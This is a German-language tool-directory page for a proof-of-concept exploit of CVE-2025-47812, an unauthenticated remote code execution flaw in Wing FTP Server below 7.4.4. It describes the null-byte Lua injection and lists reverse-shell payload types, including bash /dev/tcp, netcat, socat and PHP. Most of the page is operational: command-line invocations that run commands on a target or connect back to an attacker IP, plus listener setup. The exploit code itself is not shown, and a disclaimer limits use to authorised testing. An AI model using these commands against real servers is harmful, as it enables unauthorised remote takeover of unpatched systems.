Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47812-PoC — Nicht authentifizierter Remote-Code-Execution-Exploit für Wing FTP Server (CVE-2025-47812) mit mehreren Reverse-Shell-Payloads, interaktiven und CLI-Modi und automatisiertem Sitzungsmanagement. | Kitploit
Tools/GitHubGitHub/havbay/cve-2025-47812-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Nicht authentifizierter Remote-Code-Execution-Exploit für Wing FTP Server (CVE-2025-47812) mit mehreren Reverse-Shell-Payloads, interaktiven und CLI-Modi und automatisiertem Sitzungsmanagement.

11vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2025-47812 — Wing FTP Server Remote Code Execution (RCE)

Python CVSS Type

Übersicht

FeldWert
CVECVE-2025-47812
BetroffenWing FTP Server < 7.4.4
TypNicht authentifizierte Remote Code Execution
CVSS-Wert10.0 (Kritisch)
Behoben inWing FTP Server 7.4.4

Funktionsweise

Die Schwachstelle befindet sich im Login-Endpunkt /loginok.html. Der Server bereinigt Null-Bytes (%00) im Feld username nicht. Dadurch kann ein Angreifer beliebigen Lua-Code in Sitzungsdateien injizieren, die später serverseitig ausgewertet werden, wenn Endpunkte wie /dir.html aufgerufen werden — ohne dass eine Authentifizierung erforderlich ist.

Referenz: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Funktionen

  • Nicht authentifizierte Befehlsausführung
  • Mehrere Reverse-Shell-Payloads (socat, bash, python3, nc-e, nc-fifo, php)
  • Socat-Payload für vollständiges interaktives TTY priorisiert
  • Vorab-Erreichbarkeitsprüfung des Ziels
  • Automatische Extraktion der Session-UID mit neuer Sitzung pro Versuch
  • Bestimmten Payload über das --payload-Flag auswählen
  • Befehlsausgabe mit -o in eine Datei speichern
  • Konfigurierbare --timeout- und --delay-Werte
  • Ausführlicher/Debug-Modus mit -v
  • Saubere Ctrl+C-Behandlung
  • Payload-Zusammenfassung nach Reverse-Shell-Versuchen
  • CLI-Argumentmodus + interaktives Menü
  • Farbcodierte Ausgabe

Anforderungen

pip install requests

Verwendung

Interaktiver Modus

python3 wingftp_rce_exploit.py

CLI-Modus

# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Alle Optionen

-u / --url        Target base URL
-U / --username   Login username (default: anonymous)
-c / --command    Command to run (command mode)
-r / --rhost      Your listener IP (reverse shell mode)
-p / --rport      Your listener port (reverse shell mode)
     --payload    Specific payload to use (see list below)
     --timeout    HTTP request timeout in seconds (default: 10)
     --delay      Delay between payload attempts in seconds (default: 4)
-o / --output     Save command output to file
-v / --verbose    Enable debug output

Reverse-Shell-Payloads

NameMethode
socatVollständiges PTY über socat
bash/dev/tcp-Umleitung
python3Socket-Subprozess
nc-eNetcat mit -e-Flag
nc-fifoNetcat + mkfifo
phpPHP fsockopen

Beispiele

Befehlsausführung

Target URL : http://192.168.1.10:5466
Username   : anonymous
Choice     : 1
Command    : whoami

Reverse-Shell

Schritt 1 — Starten Sie Ihren Listener (socat für vollständiges TTY empfohlen):

socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

Oder mit nc:

nc -lvnp 4444

Schritt 2 — Führen Sie den Exploit aus:

python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Danksagung

  • Ursprünglicher PoC von blindma1den
  • Verbessert und erweitert von Havbuy

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
Verwenden Sie es NICHT gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
Nicht autorisierte Nutzung ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch.

Tool herunterladen